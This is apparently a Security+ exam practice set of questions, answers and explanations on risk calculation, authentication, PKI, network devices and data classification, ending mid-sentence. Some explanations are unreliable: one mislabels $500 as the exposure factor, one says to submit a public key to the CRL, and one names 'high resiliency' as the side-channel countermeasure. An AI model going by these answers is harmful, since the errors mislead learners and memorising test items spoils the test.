SLE The result of multiplying the asset values by the exposure factor (EF) is the single loss expectancy (SLE) value. SLE refers to the quantitative amount of loss incurred by a single event when a threat takes places. The formula for calculating SLE is: SLE = asset value x EFEF is defined as the percentage of the expected loss when an event occurs. For example, a virus hits five computer systems out of 100 before it is prevented by the safeguard from further infecting the other 95 computers, resulting in a loss of five percent of the computers. If the asset value of 100 computers is $10,000, then the exposure factor will be $500, which is five percent of the total asset value. Annualized loss expectancy (ALE) refers to the loss potential of an asset for a single year. ALE is calculated by multiplying the SLE value with the annualized rate of occurrence (ARO) of an event. ARO refers to the frequency of a threat occurring in a single year. SLE is the amount, in dollars, which an organization will lose if even a single threat event. ALE = SLE x AROLets look at an example of this: Suppose your organization has a server that is worth $10,000. When an outage occurs, you approximate that 10% of the data will be lost. The administrator has determined that the server will fail approximately 5 times each year. To calculate SLE, you would multiply the asset value ($10,000) times the exposure factor (10%) and get an SLE value of $1,000. This is the value of a single loss incident. Then to determine the ALE, you would multiply the SLE ($1,000) times the approximate number of times this incident will occur annually (5) and get an ALE value of $5,000.Total risk can be calculated by multiplying the threats, the vulnerabilities, and the asset value. Total risk = threats x vulnerabilities x asset value Actual Cost Evaluation (ACV) is typically used for insurance calculation. ACV is based on the value of the item at the time of loss, plus some percent of the total loss as defined in the insurance contact clause. A risk cannot be eliminated completely. It can be accepted, reduced, or transferred, but some amount of risk will always be present, referred to as residual risk. You can also take steps to deter against risk. Risk deterrence is any action that you take to prevent a risk from occurring. Identifying residual risk is the most important aspect of the risk acceptance strategy.

Which of the following makes use of three components: a managed device, an agent, and a network management system?

SNMP SNMP (Simple Network Management Protocol) aids in monitoring a network attached to devices and computers. It can be broken down into three components: managed devices, agents, and a network management system (NMS). Wireshark is a protocol analyzer. Performance Monitor is a Windows program that analyzes the performance of the resources on a computer, and a Security log file is a log file within the Event Viewer used to audit systems.

What are LDAP and Kerberos commonly used for?

SSO Both LDAP and Kerberos can be used for single sign-on (SSO). This eases the burden on users of having to remember different usernames and passwords and allows a single login to multiple systems. A CA is used to sign certificates, including wildcard certificates. Queries on a directory service can be made with LDAP, but not with Kerberos. SSO is a derivative of federated identity management (FIM), but FIM will be its own system altogether separate of LDAP and Kerberos.

What is the technique of adding text to a password when it is hashed?

Salting Salting is additional random data that is added to a one-way cryptographic hash. It can be used by itself or with key stretching if the hash has a weak key. Rainbow tables are used to reverse cryptographic password hashes. Salting can help to deter this attack. Symmetric cryptography deals with the encryption of data using symmetric protocols such as the Advanced Encryption Standard (AES) and the Data Encryption Standard (DES). NTLMv2 is a newer Microsoft password hash used by Windows.

Users in your organization receive an e-mail encouraging them to click a link to obtain exclusive access to the newest version of a popular smartphone. What is this an example of?

Scarcity Scarcity refers to a limited supply, something in short supply, thus "exclusive access" in the question. Some users, especially the ones at the top of the marketing pyramid—the innovators—don't want to be left out of the latest, newest, exclusive smartphone offers. It is these people that are targeted by social engineers with the method of scarcity. Most likely, the link is bogus, and leads to another website altogether unexpected by the user.It is possible that the e-mail could use the other methods mentioned in the incorrect answers, but they are not described in the scenario. An example of trust would be a money-back guarantee, or using some kind of knowledge of the user. An example of intimidation could be the use of hoax ransomware, or perhaps the e-mail says you are required to appear in court, and so on. An example of familiarity would be if a social engineer shows sympathy or empathy for a user, usually with previously learned information about the user.

You want to ensure that your systems are protected against rootkits and boot sector viruses. Which security option would be the most effective?

Secure boot and attestation Secure boot and attestation would be the most effective protection and are closely related. Secure boot creates a hash of the boot loader and associated drivers, then compares that to a previously stored hash. The stored hash may be managed by a Trusted Platform Module (TPM). Additional security can be gained by storing the hash on a remote computer for remote attestation, whereby it validates the hardware and software configuration based on information stored on a remote server. Both of these would provide file integrity, thereby protecting against rootkits and boot sector viruses.Answer B is incorrect. Full disk encryption (FDE) and self-encrypting drives (SED) are closely related. FDE goes beyond the file- and folder-level encryption in NTFS. BitLocker is one such product, and is built into all versions of Windows 7 and newer. SED drives contain an encryption chip. Two keys are required, the Media Encryption Key (MEK) and the Key Encryption Key (KEK). The user generates the KEK, and the KEK decrypts the MEK. One the MEK is decrypted, the MEK is used to encrypt and decrypt the drive. These would encrypt the contents of the drive, but would not provide file integrity.Answer A is incorrect. Hardware Root of Trust (RoT) starts with a read-only hardware identity stored in a TPM. Each startup component is validated against the RoT to protect against tampering. This protects hardware drivers but does not protect against rootkits and boot sector viruses.Answer D is incorrect. Electromagnetic interference (EMI) and electromagnetic pulses (EMPs) can cause damage to systems. At times, EMI protection can be something as simple as using STP cabling where necessary. EMP protection can include Faraday cages. Rootkits and boot sector viruses do not generate EMPs or EMI.Other issues to consider include security concerns for UEFI, BIOS, and supply chains. A computer's Unified Extensible Firmware Interface (UEFI) or Basic Input/Output System (BIOS) should always be password protected to prevent unauthorized changes. UEFI is the newer platform that performs all of the older BIOS functions, and also provides new and improved features. Supply chains must also be verified for their security practices. Vendors and others in your supply chain should adhere to at least a minimum set of security standards. For example, purchasing a server from an unverified vendor using a third-party marketplace, like eBay, could mean buying hardware that has been pre-infected with rootkits, keystroke loggers, or other types of malware.

You need to incorporate SAML and SSO into a web application. Which of the following would you use?

Shibboleth Shibboleth uses Security Assertion Markup Language (SAML), which defines security authorizations on web pages as opposed to web page elements in HTML. Shibboleth is a single sign-on (SSO) system that uses an identity provider and a service provider. OAuth is Open Authorization. The current standard, OAuth 2.0, grants an application limited access to a user's account on a third-party site, such as Facebook or Twitter. OAuth could grant the application access to a friend's list or give the application the ability to post on the user's behalf. OpenID Connect provides the authentication necessary in OAuth. It authenticates the user and stores the user information in a token. OAuth does not work with SAML.A secure token contains the user information and authentication information used by OpenID.

What kind of monitoring methodology does an antivirus program use?

Signature based Antivirus programs normally use signature-based monitoring. IDS solutions also use this. Signature-based monitoring analyzes frames and packets of network traffic for predetermined attack patterns. Anomaly-based monitoring establishes a performance baseline based on a set of normal network traffic and valuations. Behavior-based monitoring looks at the previous behavior of applications and compares that to the current activity on the system. Statistical-based monitoring is another name for anomaly-based monitoring.

Keyboard cadence is an example of which type of multifactor authentication?

Something you do Keyboard cadence is an example of something you do. When the user enters a new password, the keystroke timing (cadence) is recorded as a signature pattern. Subsequent logons are compared against the recorded signature. Even if an attacker was able obtain a user's password, there is only a remote likelihood that the attacker's cadence would match the recorded cadence.Biometrics is an example of something you are. Fingerprints, voiceprints, retina scans, and iris scans are all biometrics. Something you have is based on the user possessing some type of security device. These can include things such as smart cards, tokens, and key fobs. Something you know would be a password, a PIN, the name of a childhood friend, the color of your first car, or the answer to a similar question. For the Security+ exam, you must understand the following authentication factors: something you are, something you have, something you know, somewhere you are, and something you do.Other authentication topics include federation and federated identity and transitive trust. Federation and federated identity is a user's ability to authenticate with a single identity across multiple businesses or networks. It differs from single sign-on, where a user has one password that grants access to all the permitted network resources. Federation relies on trust relationships that are established between the different businesses or networks. Transitive trust involves creating relationships between domains to grant authenticated users access to other domains. In Active Directory, for example, if the Sales domain trusts the Marketing domain, and the Marketing domain trusts the HR domain, then Sales trusts the HR domain through a transitive relationship.

You are responsible for code quality and testing. What should you incorporate to ensure that memory allocations have corresponding deallocations?

Static code analyzers Static code analyzers look for memory allocation commands have corresponding deallocation commands. Stress testing puts a load on the system much higher than what is normally expected. For example, testing a website with 100x the normal amount of traffic will identify how the system will respond to the stress. They will not check for memory deallocations, although stress test results may indicate that memory is not being released.Answer A is incorrect. Sandboxing is developing an application outside of the production environment. Sandboxing can also be useful to test a legacy operating system that may not have security patches. Virtual machines are often used to create the sandbox. Memory allocation issues may be discovered during sandbox testing, but are not directly a part of the sandbox functionality. Answer D is incorrect. Model verification is important. There are many types of simulation model, and it is critical that you examine whatever model you use for accuracy. Any incorrect data or configuration settings in the model will yield inaccurate results. This will not check for memory deallocation.You should also keep in mind that when comparing compiled versus runtime code, compiled code is more secure. In runtime applications (Java and .NET, for example), the runtime execution environment may have vulnerabilities, so checking for the most current version is a concern.

You look through some graphic files and discover that confidential information has been encoded into the files. These files are being sent to a sister company outside your organization. What is this an example of?

Steganography Steganography is the science and art of writing hidden messages. It is a form of security through obscurity. The goal is that no one aside from the sender and receiver should even suspect that a hidden message exists. Although steganography can come in different forms, it is most commonly found in image files. Confidentiality means preventing the disclosure of information to unauthorized persons. By definition, cryptography is the practice and study of hiding information. In computer science, cryptography uses encryption to hide information and make it secret, whereas steganography, if accomplished correctly, does not imply that a hidden message even exists. If a person were to see an encrypted cryptographic message, they would know it for what it is and may try to crack it. A digital signature authenticates a document or e-mail, letting the recipient know that the document was created and sent by the actual sender and not someone else.

Your web server's private key has been compromised by a malicious intruder. What, as the security administrator, should you do?

Submit the public key to the CRL. In a PKI, an asymmetric key pair is created. The private key is kept secret, but the public key is distributed as needed. It is this public key that should be submitted to the CRL so that no other entities utilize it. A new key pair will then be created at the CA.A new CA is not necessary. It would only be necessary if the entire CA was compromised, which is not part of the scenario. The private key is not seen by other entities, so only the public key should be submitted to the CRL. Key escrow is when copies of keys are kept in the case a third party needs access to data.

Which of the following common use cases would address the issue of data leakage from a side-channel attack?

Supporting high resiliency Supporting high resiliency, such as using a highly resilient algorithm, would address the issue of data leakage from a side-channel attack. Supporting confidentiality refers to the ability of the system to maintain the privacy of the data transmission. This is often accomplished through encryption. Supporting integrity validates that no data can be altered without being detected. This is often accomplished through data hashing.Supporting non-repudiation would prevent an imposter from denying that a message was sent, but it does not address data security. Non-repudiation ensures that data's origin is known. Digital signatures are the most common method of ensuring non-repudiation. Other common use cases for cryptography must be understood for the Security+ exam include low-power devices, low latency, obfuscation, supporting authentication, and resource versus security constraints.Low-power devices should use cryptographic techniques that require less time to encrypt and decrypt data. As the time required to encrypt or decrypt increases, the power requirements increase as well. Devices such as such as wireless devices, handheld computers, smart cards, and cellular phones have less processing power, storage, power, memory, and bandwidth than other systems, and would benefit from algorithms with shorter key lengths.Low latency is a concern with any cipher. Latency refers to the delay between the time the plain text is input and the cipher text is generated. Obfuscation is the most basic element in a cryptographic system. Obfuscation refers to hiding the data, and is accomplished through encryption and steganography. Supporting authentication is the process of validating that the message originator is indeed who they say they are, and not an imposter. This is often implemented using digital certificates. It is also important to determine resource versus security constraints. Resource constraints could include available bandwidth, environmental constraints, and financial constraints. Security constraints would deal with the limitations of the particular cryptographic system chosen.

You want to reduce network traffic on a particular network segment to limit the amount of user visibility. Which of the following is the best device to use in this scenario?

Switch A switch can reduce network traffic on a particular network segment. It does this by keeping a table of information about computers on that segment. Instead of broadcasting information to all ports of the switch, the switch selectively chooses where the information goes.

You are reviewing your organization's continuity plan, which specifies an RTO of six hours and an RPO of two days. Which of the following is the plan describing?

Systems should be restored within six hours with a maximum of two days' worth of data latency. RTO stands for recovery time objective, the acceptable amount of time to restore a function, service, or entire system. In the question the RTO is six hours, and so systems should be restored within six hours. RPO stands for recovery point objective, the acceptable latency of data, or the maximum tolerable time that data can remain inaccessible after a disaster. In the question the RPO is two days, and so there should be a maximum of two days' worth of data latency.

You need to control access to a network through a Cisco router. Which of the following authentication services should you use?

TACACS+ TACACS+ is commonly used to control access to networks through Cisco routers. SSH is used primarily to remotely configure Linux/Unix hosts as well as routers but is not used for the actual authentication to the networks that the routers control. Telnet was used to administer network devices, but it is not the best answer because it is not an authentication protocol, and it is insecure and outdated. SNMP is used to monitor network devices and hosts.

The organization you work for, a video streaming company, hired a security consultant to find out how customer credit card information was stolen. He determined that it was stolen while in transit from gaming consoles. What should you implement to secure this data in the future?

TCP Wrapper TCP Wrapper is a host-based ACL program that provides protection against host name and host address spoofing in Linux and Unix environments. Most gaming consoles are Linux-based, and the video streaming servers they connect to are most likely Linux- or Unix-based as well. By using this program, rules can be configured to restrict access to TCP services. For example, attackers can easily determine when an unprotected Linux-based system is idle, and then attempt to access that system when it is unattended. The TCP Wrapper program acts as a pseudo-firewall in that it monitors incoming packets for authorization, thereby blocking the potential attacker. Programs used for streaming can be compiled with TCP Wrapper, and these can also be encrypted to further foil the would-be attacker. (Often this program is also referred to as TCP Wrappers.) By the way, credit card numbers should usually be stored in a transactional database that encrypts down to the database field level, not only the file level.Firmware updates are important for any system, but will not stop the problem being described. Some kind of software such as TCP Wrapper (an application layer program) is needed. A web application firewall (WAF) isn't the correct type of firewalling required by video streaming servers and the gaming consoles that connect to them. Plus, WAF along with IDS are solutions that are installed at the server side. This scenario calls for secure coding of the program that transmits data between the gaming consoles and the video streaming servers.

Which of the following would be considered detrimental effects of a virus hoax? (Select the two best answers.)

Technical support resources are consumed by increased user calls. Users are tricked into changing the system configuration. Because a virus can affect many users, technical support resources can be consumed by an increase in user phone calls. This can be detrimental to the company because all companies have a limited number of technical support personnel. Another detrimental effect is that unwitting users may be tricked into changing some of their computer system configurations. The key term in the question is "virus hoax." The technical support team might also be inundated by support e-mails from users, but not to the point where the e-mail server capacity is consumed. If the e-mail server is consumed by message traffic, that would be a detrimental effect caused by the person who sent the virus and by the virus itself but not necessarily by the hoax. Although users may be at risk for identity theft, it is not one of the most detrimental effects of the virus hoax.

Your network has a DHCP server, AAA server, LDAP server, and e-mail server. Instead of authenticating wireless connections locally at the WAP, you want to utilize RADIUS for the authentication process. When you configure the WAP's authentication screen, what server should you point to, and which port should you use?

The AAA server and port 1812 AAA in computer security is an acronym that refers to authentication, authorization, and accounting. RADIUS (Remote Authentication Dial-In User Service) is an example of an AAA server, and would be the server that takes care of authentication for the wireless access point (WAP) in this scenario. By default, the RADIUS server uses port 1812 for authentication. Also by default, it does this over a UDP transport mechanism (though it can use TCP as well). The DHCP server (which uses ports 67 and 68) takes care of assigning IP addresses to computers on the network that require dynamic assignment. The Lightweight Directory Access Protocol (LDAP) server is used to maintain directory information, for example, in a Microsoft domain controller or an e-mail server. It uses port 389. It is based on the X.500 specification, and allows either unencrypted authentication or encrypted authentication via Transport Layer Security (TLS). An e-mail server that uses port 143 has the Internet Message Access Protocol (IMAP) e-mail protocol running. Though this server may be involved in the authentication of e-mail logins, it does not authenticate for connections made to a WAP.port

You work for a company that installs networks for small businesses. During a recent deployment, you configure a network to use the Internet Protocol Security (IPSec) protocol. The business owner asks you to explain why this protocol is being used. Which three are valid reasons for using this protocol?

The IPSec framework is used in a VPN implementation to secure transmissions. IPSec can work in either tunnel mode or transport mode. IPSec uses ESP and AH as security protocols for encapsulation. Internet Protocol Security (IPSec) uses Encapsulating Security Payload (ESP) and Authentication Header (AH) as security protocols. AH provides the authentication mechanism, and ESP provides encryption, confidentiality, and message integrity. IPSec can operate in either tunnel mode or transport mode. In transport mode, only the message part of a packet (the payload) is encrypted by ESP. In IPSec tunnel mode, the entire packet including the packet header and the routing information is encrypted. IPSec tunnel mode provides a higher level of security than transport mode. Either of the two modes can be used to secure either gateway-to-gateway or host-to-gateway communication. If used in gateway-to-host communication, the gateway must act as the host. IPSec sets up a secure channel that uses a strong encryption and authentication method between two network devices, such as routers, VPN concentrators, and firewalls. IPSec can provide security between any two network devices running IPSec, but its chief implementation is in securing virtual private network (VPN) communications. IPSec provides security by protecting against traffic analysis and replay attacks. IPSec is primarily implemented for data communication between applications that transfer data in plain text. IPSec secures the network device against attacks through encryption and encapsulation.Answer E is incorrect. The IPSec does not use the L2TP protocol to encrypt messages. L2TP is used for secure communication in VPN networks and is a hybrid of L2F and PPTP. IPSec ensures integrity and confidentiality of IP transmissions, but cannot ensure availability of the information.

On Monday, all employees of your organization report that they cannot connect to the corporate wireless network, which uses 802.1X with PEAP. A technician verifies that no configuration changes were made to the wireless network and its supporting infrastructure, and that there are no outages. Which of the following is the most likely cause of the problem?

The Remote Authentication Dial-In User Service certificate has expired. 802.1X secure network access can be used to connect to wireless networks. It can use EAP, CHAP, or PEAP authentication. It can also utilize centralized authentication such as RADIUS. Though the scenario does not say so specifically, you can assume an 802.1X/PEAP/RADIUS configuration. If the RADIUS certificate expires, none of the wireless users would be able to connect. The DNS server is a separate service altogether. If it was overwhelmed (perhaps by a DDoS attack), then DNS queries would fail, but those queries would be to items on the domain, or websites, and so on. It should not affect the wireless network. Too many incorrect authentication attempts could cause some users to be disabled, but most likely this will be a temporary loss of service. In the scenario, all employees report no service to the wireless network. The scenario also states the technician verified that there were no outages, so the IDS should not have disabled the wireless network.

attestation

The act of verifying whether a process is secure; for example, the secure boot process of a UEFI-based system.

A computer that is connected to an NAC-enabled network is not asked for the proper NAC credentials. What is a possible reason for this?

The computer is missing the authentication agent. In a network access control (NAC) enabled network, computers must have the authentication agent installed; otherwise, the NAC system will not ask for the credentials (and the computer will not get access to the network). The authentication agent is also known as a supplicant (in 802.1X systems, for example). The patch level, antivirus definitions, and service packs (SPs) are separate from the NAC system.

A user complains that they were browsing the Internet when the computer started acting erratically and crashed. You reboot the computer and notice that performance is very slow. In addition, after running a netstat command you notice literally hundreds of outbound connections to various websites, many of which are well-known sites. Which of the following has happened?

The computer is now part of a botnet The computer is probably now part of a botnet. The reason the system is running slowly is probably due to the fact that there are hundreds of outbound connections to various websites. This is a solid sign of a computer that has become part of a botnet. Spyware, viruses, and rootkits might make the computer run slowly, but they will not create hundreds of outbound connections.

What can happen if access mechanisms to data on an encrypted USB hard drive are not implemented correctly?

The security controls on the USB drive can be bypassed. If access mechanisms such as permissions and policies are not implemented correctly on a USB hard drive (or any hard drive for that matter), then those security controls for that drive can be bypassed by an attacker. The possibility of data corruption usually happens because a hard drive physically fails or becomes too fragmented, not because of security controls being bypassed. Data on the USB drive should not be vulnerable to log analysis because the logs are normally stored in the system partition of the operating system. That drive is internal to the computer, whereas a USB hard drive will be external to the computer. The same holds true for user accounts. Those accounts are stored within the OS, and again on the main drive, not on a USB hard drive.

A visitor plugs her laptop into the network in the conference room and attempts to start a presentation that requires Internet access. The user gets a warning on the screen saying that her antivirus software is not up to date. As a result, the visitor is unable to access the Internet. What is the most likely cause of this?

The security posture on the network is enabled, and remediation must take place before the user can access the Internet. The security posture can be defined as the risk level to which a system is exposed. If enabled, a system will need to meet particular security requirements. In this case, the user cannot access the Internet with her laptop until the antivirus software is updated (the remediation). If the security posture were disabled, the user would not need to update her system. An IDS will not block access to the network. Instead, an IDS will detect malicious activity on the network. An IPS is not designed to prevent internal users from accessing the network; it is designed to prevent malicious activity on the network.

An attacker gained access to your server room by physically removing the proximity reader from the wall near the entrance. This caused the electronic locks on the door to release. Why did the locks release?

The system was designed to fail-open for life safety. In this scenario, the system did what it was supposed to do. In the case of a failure, the security administrator designed the system to fail-open, meaning that the door would unlock, allowing people to leave the server room in the event of an emergency (thus the meaning of life safety). The attacker probably had knowledge of this design, and so planned the attack accordingly. To protect against the attacker gaining access in this scenario, multifactor authentication could be implemented. For example, adding biometrics, a passcode, or other form of authentication. The proximity reader was definitely installed properly. It's just that the system has vulnerabilities, one of which the attacker has exploited. These vulnerabilities are built into the design of the system for safety. We don't know whether or not the system uses magnetic locks; there is not enough information in the question to make that assumption. The system was not designed in a fail-close configuration. If it was, the door would have remained locked when the proximity reader was broken.

Which of following log files would be the most useful in determining which internal user was the source of an attack that compromised another computer on the same network?

The target computer's audit logs The target computer's audit logs should show the IP address and MAC address of the attacking computer if it were within the same network. Directory Services logs give information about Active Directory on a domain controller. It would be difficult to find out who the attacking computer is, which is why you look to the target computer (the computer that was affected by the attack) for clues. The firewall logs show information concerning attackers from outside the network but will probably not give information about attackers inside the network.

The new security plan for your organization states that all data on your servers must be classified to ensure appropriate access controls are implemented. Which statements are true of information classification?

The two primary classes of data classification deal with military institutions and commercial organizations. A data owner must determine the information classification of an asset. Data classification refers to assigning security labels to information ass Data classification refers to assigning security labels to information assets. The data owner must determine the information classification of an asset. Data classification is the most crucial method used to ensure data integrity. It is the responsibility of the data owner to decide the level of classification that the information requires. One purpose of information classification is to define the parameters required for security labels. After being classified, it is difficult to declassify data. There are two data classification systems: commercial and military. The types of commercial data classification are as follows: Confidential: Data classified as confidential is meant for use within the organization, irrespective of whether it is commercial or military. This is the only common category between the commercial and military classification systems. Confidential information requires authorization for each access and is available to those employees in the organization whose work relates to the subject. Confidential data is exempted from the Freedom of Information Act (FOIA). Examples include trade secrets, programming codes, or health care information. This can also be referred to as high classification. Private: Private information is personal to the employees of a company so it must be protected as well. An example is the salary of employees. This can also be referred to as medium classification. Sensitive: Sensitive information requires special protection from unauthorized modification or deletion. In other words, integrity and confidentiality need to be ensured. Examples include financial information, profits, or project details. Public: Disclosure of public information would not cause any problem to the company. An example is new project announcements. This can also be referred to as low classification. The types of military data classification are as follows: Top-secret: Information classified as top secret and crucial for national security. Examples include spy satellite information and blueprints to newly developed weapons. Secret: Secret information can pose a threat to national security if disclosed. Examples include deployment of troops and nuclear warheads. Confidential: Confidential information requires authorization for each access and is available to only those in the military organization whose work relates to the subject. Sensitive but unclassified: A military classification for minor secrets, such as medical data and answers to test scores. Unclassified information is not sensitive or classified. Examples are computer manuals or warranty details of a product or a device.Other types of data include proprietary data, PII, and PHI. Proprietary data is any data owned by an organization that helps define that organization, such as copyrights and patents. Personally identifiable information (PII) is data that can be used to identify an individual. Personal health information (PHI) is health data about individuals. Organizations should take special care to ensure that these types of data are adequately protected.Three organizational roles that may deal with data classification are the data custodian or steward, data owner, and privacy officer. The data owner is responsible for setting the data classifications and approving the level of access given to personnel. The data custodian is responsible for configuring the appropriate level of access for users and for backing up the data. The privacy officer must ensure that appropriate privacy laws are followed and that data is protected.

Why would you use a vulnerability scanner?

To identify open ports on a computer Vulnerability scanners are primarily used to find open ports on a computer and define what threats are associated with those ports. Remote access policies should be identified within the server where the policy was created (for example, in Windows Server). Password recovery programs such as John the Ripper should be used to crack passwords. To see whether passwords are being sent as clear text, you should use a protocol analyzer.

What is the best reason for security researchers to use virtual machines?

To offer an environment where malware might be executed but with minimal risk to equipment The best reason why security researchers use virtual machines is to offer an environment whereby malware might be executed but with minimal risk to the equipment. The virtual machine is isolated from the actual operating system, and the virtual machine can simply be deleted if it is affected by viruses or other types of malware. Although the other answers are possible reasons why a security researcher would use a virtual machine, the best answer is that it offers the isolated environment where a malicious activity can occur but be easily controlled and monitored.

Why would you deploy a wildcard certificate?

To reduce the burden of certificate management A wildcard certificate (usually associated with SSL certificates) secures a website URL and an unlimited number of its subdomains. For example, it could secure www.davidlprowse.com, as well as the fictitious subdomains sy0-501.davidlprowse.com, blog.davidlprowse.com, and so on. Instead of having multiple SSL certificates, you could use a single wildcard SSL certificate. This can make the management of certificates easier, and can possibly save time and money. Extending the renewal date of a certificate is incorrect because, generally, a renewal of a certificate simply means that a new certificate is purchased; a CSR is generated (with a new RSA private key) and submitted for approval. The same goes for increasing a certificate's encryption key length. Normally, this is not done, and a new certificate is purchased. Due to a mandate with a deadline of December 31, 2013, companies began renewing any certificates that were based on RSA encryption lower than 2048-bit. So, any older 1024-bit certificates were also added to the organization's certificate revocation list (CRL). Securing the certificate's private key is incorrect because the wildcard functionality has nothing to do with this. The certificate is based on the RSA private key, but this key should not be known by anyone accept the person who generated it. Again, this key should be 2048-bit.

You want to secure data passing between two points on an IP network. What is the best method to protect from all but the most sophisticated APTs?

Transport encryption When securing data that passes between two points on an IP network, you need some kind of transport layer communications encryption protocol. Examples include Transport Layer Security (TLS) and Secure Sockets Layer (SSL). Protocols such as these operate on layer 4 of the OSI model; they encrypt the transmissions between IP-based computers, protecting the session data from eavesdroppers, and are thus known as transport layer encryption protocols. They make use of X.509 certificates and a public key infrastructure (PKI). These protocols can utilize block ciphers (for instance, Advanced Encryption Standard [AES]) or stream ciphers (for example, RC4), but more commonly use the former. By the way, APT stands for advanced persistent threat, a group of continuous hacking processes often performed by multiple attackers. APTs are carried out by knowledgeable groups of people using very sophisticated attacks; often they reside in another country.Key escrow is when decryption keys are held in escrow (placed in the custody of a third party), in the case that they are needed to gain access to data. They are common in PKI systems. This is a concept of where keys are stored, but not a method of encrypting data transmissions between two hosts. The answers "block ciphers" and "stream ciphers" are not specific enough. You can use either as part of an overall solution to secure data passing between two points on an IP network, but more often than not you will encounter SSL certificates that make use of RSA (for the key exchange) and AES (the actual cipher used for the transfer of session data).

A thumb drive has been used to compromise systems and enable unauthorized access. What kind of malware was most likely installed to the thumb drive?

Trojan Trojans are used to access a system without authorization. They can be installed to USB flash drives, can be remote access programs, or could be unwittingly stumbled upon when accessing disreputable websites. The key phrase here is "unauthorized access"; that is what the Trojan is trying to do. A bot is a computer that performs actions without the user's consent and is often controlled by a remote master computer. Although the bot doesn't enable unauthorized access, a Trojan might carry a bot program as part of its payload. Logic bombs are generally a method of transferring malware and are meant to initiate a malicious function at a specific time. Viruses infect a computer but are not used for unauthorized access.

Which type of attack relies on mistakes made by users when they input Web addresses?

URL hijacking A URL hijacking, or typo squatting, attack relies on mistakes made by users when they input Web addresses.Answer A is incorrect. A malicious insider threat occurs when legitimate users take advantage of the valid access they have to resources to carry out an attack against an organization. Disgruntled employees are most often the malicious insiders that initiate these attacks.Answer B is incorrect. A watering hole attack occurs when an attacker profiles victim to discover the sites they visit. The attacker then accesses the most commonly accessed sites for vulnerabilities. Once a vulnerability is discovered, the attacker then compromises the site and redirects users to an alternative site that will infect the computers of users who access this alternative site. This attack may also be called a waterhole attack.Answer C is incorrect. A denial of service (DoS) attack occurs when attackers overrun a server with requests so that legitimate users cannot access the server.

What is the best countermeasure for a buffer overflow attack on a commercial application?

Update the software with the latest patches, updates, and service packs. The best countermeasure for a buffer overflow attack on a commercial application is to update the software with the latest patches, updates, and service packs. A buffer overflow occurs when a buffer receives more data than it is programmed to accept. Buffer overflow attacks exploit poor programming techniques and code review. These attacks are common on Web servers. Input validation is another countermeasure for buffer overflow attacks. Input validation can prevent the input of certain characters that would cause an application or database to lock up. The best countermeasure for a buffer overflow attack on a company-developed, proprietary application would be to edit the application code to include bounds checking to ensure that data is of an acceptable length.Answer B is incorrect. The best countermeasure for replay attacks is to implement timestamps and sequence numbers.Answer A is incorrect. The best countermeasure for maintenance hooks is to implement code reviews and quality assurance on a regular basis.Answer D is incorrect. A buffer overflow attack can be detected using a packet sniffer by examining packets that are being transmitted on your network. A long string of numbers in the middle of a packet is indicative of a buffer overflow attack.

Your client operates a 24-hour call center. Several different employees may log in to the same workstation in the course of a week. Machine (computer) certificates are currently used, but they do not provide sufficient security safeguards because more than one employee logs in to each machine. You need to ensure that each employee has his or her own credential. What should you implement?

User certificate User certificates are assigned to individual users, much like machine/computer certificates are assigned to individual machines. Users must provide their assigned certificate for authentication prior to accessing certain resources. This certificate may be provided to web sites, hosts, and any authentication mechanism. By contrast, machine/computer certificates are assigned to a designated machine. During authentication, the computer (or machine) requesting access must supply the certificate assigned to it. In this scenario the users all share machines, so a machine certificate does not provide additional safeguards.Answer B is incorrect. Domain validation certificates are very common. They are low-cost, and are often used by web admins to offer TLS to a domain. They are validated using only the domain name. In this scenario, all users are in the same domain, so a domain validation certificate would not provide additional safeguards.Answer A is incorrect. Wildcard certificates allow you to create a certificate in a domain, and use that same certificate for multiple subdomains. For example, if you had mail.mysite.com, ftp.mysite.com, and www.mysite.com, you could issue a wildcard certificate for mysite.com, and have it cover all the subdomains. Without the wildcard certificate, you would have to issue a certificate for each subdomain. Answer D is incorrect. Self-signed certificates are digitally signed by the user. This is often provided by Microsoft Internet Information Services (IIS). The self-signed certificate will transmit a public key, but that key will be rejected by browsers. Self-signed certificates are not as secure because they are not issued by a third party.You should also be familiar with email certificates, SAN fields, code signing certificates, extended validation certificates, root certificates, and domain validation certificates.Extended validation certificates, as the name suggests, provide additional validation for HTTPS web sites. The certificate provides the name of the legal entity responsible for the web site. These certificates require the most effort by the CA to validate and provide a higher level of trust than domain validation because they are validated using more than the domain information.Email certificates are used to secure email. One such example is Secure Multipurpose Internet Mail Extensions (S/MIME), which provides a digital "signature" for that email. Root certificates define the root CA and validate all other certificates issued by that CA. They are at the top of the CA hierarchy. They are self-signed and are closely guarded.Subject Alternative Name (SAN) is a field in the certificate definition that allows you to stipulate additional information, such as an IP address or host name, associated with the certificate. Code signing certificates are used for code that is distributed over the Internet, including programs or applications. Code signing certificates verify the code's origin and help the user trust that the claimed sender is indeed the originator.Domain validation certificates are very common. They are low-cost, and are often used by web admins to offer TLS to a domain. They are validated using only the domain name.

Ann has been asked by her boss to periodically ensure that a domain controller/DNS server maintains the proper security configuration. Which of the following should she review?

User rights The best answer is user rights. A domain controller is in charge of user accounts and the permissions (rights) associated with those users. The domain controller might have a host-based firewall, but that is doubtful. Chances are that the firewall is network-based or, less commonly, is running on a separate server. The NIPS is the network intrusion prevention system, which is external from the server and usually resides on the perimeter of the network. The WINS configuration can be reviewed to verify the security of the WINS database and service but does not allow for review of the security configuration of the server as described, which is a domain controller/DNS server. Also, if the server is running the DNS server, it likely isn't also running the WINS service.

You are designing a network. In addition to placing devices in a peripheral network, you need to place security devices in several key departments. Which of the following security devices could NOT be placed wherever they are needed in the network?

VPN concentrators VPN concentrators cannot be placed wherever they are needed in the network. VPN concentrators should be placed in the perimeter network near the gateway. Answers D, C, and B are incorrect. Load balancers, correlation engines, and aggregation switches could be placed where they are needed in the network. No particular type of location is better than another for their purposes. Correlation engines examine logs from several firewalls and aggregate the entries to determine attack patterns. As long as the firewall is accessible from the correlation engine, it is not necessary that the correlation engine be placed in close proximity to the firewall. Aggregation switches create a single bandwidth stream from multiple sources. They can be placed anywhere they are needed. Proxies are best suited for placement in the perimeter network.Other security devices and technologies that are sensitive to their placement include DDoS mitigators, sensors, collectors, load balancers, SSL accelerators, taps, and SDN. Sensors, collectors, and correlation engines should be placed closest to the devices being monitored to improve performance. Load balancers are usually placed in the same networks as devices that receive a high load. VPN concentrators should be placed on the VPN perimeter. SSL accelerators should be placed close to or on the devices using SSL. Taps should be placed closest to the devices they are monitoring. SDN can be used anywhere, but the SDN controller should be centrally located to provide the best performance for all devices that communicate via the SDN.A DDoS mitigator should be placed in the perimeter network, so that it can detect and mitigate a DDoS attack.Sensors are a classification of security devices that collection information on a host or on the network. Based on the information received, they may produce an alert or react with a trigger. Collectors are 